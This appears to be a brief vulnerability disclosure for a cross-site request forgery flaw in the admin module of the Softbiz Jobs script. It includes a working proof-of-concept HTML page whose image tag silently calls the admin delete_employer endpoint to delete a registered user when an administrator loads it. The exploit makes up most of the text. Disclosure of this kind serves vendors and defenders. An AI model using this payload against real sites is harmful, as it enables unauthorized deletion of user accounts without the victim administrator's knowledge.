1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
======================================================================= Softbiz Jobs CSRF Vulnerability ======================================================================= by Pratul Agrawal # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Downloadhttp://www.softbizscripts.com/ # Scriptsoftbizscripts # Proof of concept Script to delete the registered user through Cross Site request forgery ................................................................................................................... <html> <body> <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] /> </body> </html> ................................................................................................................... After execution refresh teh page and u can see that user having id=20 get deleted automatically. #If you have any questions, comments, or concerns, feel free to contact me. |